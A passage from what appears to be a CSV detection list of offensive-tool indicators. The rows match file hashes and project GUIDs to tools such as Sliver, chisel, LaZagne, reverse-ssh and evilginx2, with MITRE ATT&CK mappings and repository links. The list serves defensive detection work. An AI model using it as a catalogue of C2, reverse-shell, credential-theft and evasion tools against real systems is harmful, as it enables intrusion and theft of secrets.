often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*8493D0F0-CA01-4C5A-A6E3-C0F427966ABD*",".{0,1000}8493D0F0\-CA01\-4C5A\-A6E3\-C0F427966ABD.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*84b50a32ee55280e0f5c68a772b25b3efa489125f75057b03ec31156c19b4041*",".{0,1000}84b50a32ee55280e0f5c68a772b25b3efa489125f75057b03ec31156c19b4041.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*84d265868a788a2888bcfa2c6d34021670787c23a4bdd60fca1334248cd1f3c7*",".{0,1000}84d265868a788a2888bcfa2c6d34021670787c23a4bdd60fca1334248cd1f3c7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*84d92157948ff717a224b4dd81ceae8e300b9b363293d6417da97925b4c59ba9*",".{0,1000}84d92157948ff717a224b4dd81ceae8e300b9b363293d6417da97925b4c59ba9.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*84dbd3a0c2e858b59822ee50b7d72972851ca692416c15c5f351831381aa4db9*",".{0,1000}84dbd3a0c2e858b59822ee50b7d72972851ca692416c15c5f351831381aa4db9.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*84e1091e97d33b0b8ae7c600f649e0cbaf00c1b7650d965ba4ef903eee709550*",".{0,1000}84e1091e97d33b0b8ae7c600f649e0cbaf00c1b7650d965ba4ef903eee709550.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*84e42cfadcc56fd72ad041ad692cc880eede230412bd6cdc3bcf90523b10a98e*",".{0,1000}84e42cfadcc56fd72ad041ad692cc880eede230412bd6cdc3bcf90523b10a98e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*84f191e9992ba2fd44147adea679f3315d3bc3a21d3c3267425017711a240da7*",".{0,1000}84f191e9992ba2fd44147adea679f3315d3bc3a21d3c3267425017711a240da7.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*84fca6c04d81477223b295838e3edb59744fc564c68c614b93c33a537a066bd6*",".{0,1000}84fca6c04d81477223b295838e3edb59744fc564c68c614b93c33a537a066bd6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*8524836909172fcdcfc6c1e805d775bdf84a499113a645d2fce7797d89af6dc7*",".{0,1000}8524836909172fcdcfc6c1e805d775bdf84a499113a645d2fce7797d89af6dc7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*853d769d63efcbc5d78f3f81c7cae176bf34c248d3bbbf6f32b4bc5d5de561e8*",".{0,1000}853d769d63efcbc5d78f3f81c7cae176bf34c248d3bbbf6f32b4bc5d5de561e8.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*85474d2a885a2dbe2dfd334d9d25fbf1079c1d88c857428e2e1cf3e59f2c0a9b*",".{0,1000}85474d2a885a2dbe2dfd334d9d25fbf1079c1d88c857428e2e1cf3e59f2c0a9b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*854A20FB-2D44-457D-992F-EF13785D2B51*",".{0,1000}854A20FB\-2D44\-457D\-992F\-EF13785D2B51.{0,1000}","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","0","N/A","10","4","340","45","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" "*8574d9733f8ab02facc74b6b2e51a5a0f4eb5c370e005de4987586cb53b52314*",".{0,1000}8574d9733f8ab02facc74b6b2e51a5a0f4eb5c370e005de4987586cb53b52314.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*857d1a53ab8df17acd27c5a26a77cdf070b2cd6e78bcbf011eef3c81dd5cd9ae*",".{0,1000}857d1a53ab8df17acd27c5a26a77cdf070b2cd6e78bcbf011eef3c81dd5cd9ae.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*85a5981495372d449656d4da528a0884e3bf06307f0e52756823cd474a687cc6*",".{0,1000}85a5981495372d449656d4da528a0884e3bf06307f0e52756823cd474a687cc6.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*85ef86a80dfd91208cf5eaaafd220a584c591ed83c22ee039b31b9849d7428d0*",".{0,1000}85ef86a80dfd91208cf5eaaafd220a584c591ed83c22ee039b31b9849d7428d0.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*85fcc2b2c19bc9355cbe509a9ef3ebe10005f1c8a9887df12a6295f25008d260*",".{0,1000}85fcc2b2c19bc9355cbe509a9ef3ebe10005f1c8a9887df12a6295f25008d260.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*861c5434860a97737943516d0e93e91f5484c8ea557672763ab55bb8c4bbc979*",".{0,1000}861c5434860a97737943516d0e93e91f5484c8ea557672763ab55bb8c4bbc979.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*862a3fb241e9b9e821a5612e1dd5f7565aefdaee978bef994bc4817d9711409d*",".{0,1000}862a3fb241e9b9e821a5612e1dd5f7565aefdaee978bef994bc4817d9711409d.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*862DA0DA-52E1-47CD-B9C2-46B106031B28*",".{0,1000}862DA0DA\-52E1\-47CD\-B9C2\-46B106031B28.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*862f7ba58bbf77543812637ecc32d277fce062d21bc97587e5816e8fb05634e3*",".{0,1000}862f7ba58bbf77543812637ecc32d277fce062d21bc97587e5816e8fb05634e3.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*863e5c3db9d52c8af4ad2976dbfe510a8eaaec2affba50a5abd916e440e18804*",".{0,1000}863e5c3db9d52c8af4ad2976dbfe510a8eaaec2affba50a5abd916e440e18804.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*86445d7ef450ddcb190f14c6f7fc8a1a33945c45*",".{0,1000}86445d7ef450ddcb190f14c6f7fc8a1a33945c45.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*865c9da731e9dedc483277985a51af9ef08f736e512447233ac4bec008539443*",".{0,1000}865c9da731e9dedc483277985a51af9ef08f736e512447233ac4bec008539443.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*866e5289337ab033f89bc57c5274c7ca*",".{0,1000}866e5289337ab033f89bc57c5274c7ca.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1223","180","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" "*8672d46e879f704b4b41a401c1a0aae5e6365f18a798a1fbaa4b1a8e711db34b*",".{0,1000}8672d46e879f704b4b41a401c1a0aae5e6365f18a798a1fbaa4b1a8e711db34b.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*8694c7e87215c274f09116eb2f13cd23cf847abc46a25977088873b0d353c368*",".{0,1000}8694c7e87215c274f09116eb2f13cd23cf847abc46a25977088873b0d353c368.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*86dc38ec63d7ddfab38fe655ac2296f328b1fcf43a070bad92cb6c1d3d721d49*",".{0,1000}86dc38ec63d7ddfab38fe655ac2296f328b1fcf43a070bad92cb6c1d3d721d49.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*86fc2c94f8fa3938e3261d0b9eb4836be289f8ae*",".{0,1000}86fc2c94f8fa3938e3261d0b9eb4836be289f8ae.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://securelist.com/xz-backdoor-story-part-1/112354/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*8704db81460c783dfafccc4414e9346aa6eeadcfd09984c26e5f1e4e895238d3*",".{0,1000}8704db81460c783dfafccc4414e9346aa6eeadcfd09984c26e5f1e4e895238d3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*873fdbf2756b2826ee7946770aacd8945e3d3470cb5ced3a23c36b0a988d1b1e*",".{0,1000}873fdbf2756b2826ee7946770aacd8945e3d3470cb5ced3a23c36b0a988d1b1e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8744313fbf925e7dc5aada01fa6b89589bdac85546a51c766fe51b763c984487*",".{0,1000}8744313fbf925e7dc5aada01fa6b89589bdac85546a51c766fe51b763c984487.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*874dbda99983730fafd8054b29996e692cfe12c4230cb97d3b53e5db4df4238c*",".{0,1000}874dbda99983730fafd8054b29996e692cfe12c4230cb97d3b53e5db4df4238c.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*875c428604faaa6f393b263aef783d9cd535b57135d668d949014052132e3c8b*",".{0,1000}875c428604faaa6f393b263aef783d9cd535b57135d668d949014052132e3c8b.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*8760b515dc5f94eaed37ef0ded50d083cc32e65e5b430089482c00fd40c0c555*",".{0,1000}8760b515dc5f94eaed37ef0ded50d083cc32e65e5b430089482c00fd40c0c555.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*876b33b3871778abc2ac0523ef7ef9a23302eebbac92b193ac564946207f9477*",".{0,1000}876b33b3871778abc2ac0523ef7ef9a23302eebbac92b193ac564946207f9477.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*87904247-C363-4F12-A13A-3DA484913F9E*",".{0,1000}87904247\-C363\-4F12\-A13A\-3DA484913F9E.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*879A49C7-0493-4235-85F6-EBF962613A76*",".{0,1000}879A49C7\-0493\-4235\-85F6\-EBF962613A76.{0,1000}","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","0","N/A","7","3","210","20","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z" "*87ad24ba9c07337abc8310c7107359fdcf86b9e182b7b93e1f375888fb82dfc1*",".{0,1000}87ad24ba9c07337abc8310c7107359fdcf86b9e182b7b93e1f375888fb82dfc1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*87BEF4D7-813E-48BA-96FE-E3A24BF2DC34*",".{0,1000}87BEF4D7\-813E\-48BA\-96FE\-E3A24BF2DC34.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*87c4041617fc7010b7e20630ae48cc8c17dc84cd6fb5c330f0bc92af52baa2fa*",".{0,1000}87c4041617fc7010b7e20630ae48cc8c17dc84cd6fb5c330f0bc92af52baa2fa.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*87c96e5d650e67d985bdbb2bf4be55c94f8b967b180d45c1c073cbcd57cf1ddb*",".{0,1000}87c96e5d650e67d985bdbb2bf4be55c94f8b967b180d45c1c073cbcd57cf1ddb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*88113ededbda181be6c6f9bd4ba8145666b48bf9e9b8dc170e66e884b10fdc91*",".{0,1000}88113ededbda181be6c6f9bd4ba8145666b48bf9e9b8dc170e66e884b10fdc91.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*881D4D67-46DD-4F40-A813-C9D3C8BE0965*",".{0,1000}881D4D67\-46DD\-4F40\-A813\-C9D3C8BE0965.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","8","5","444","60","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" 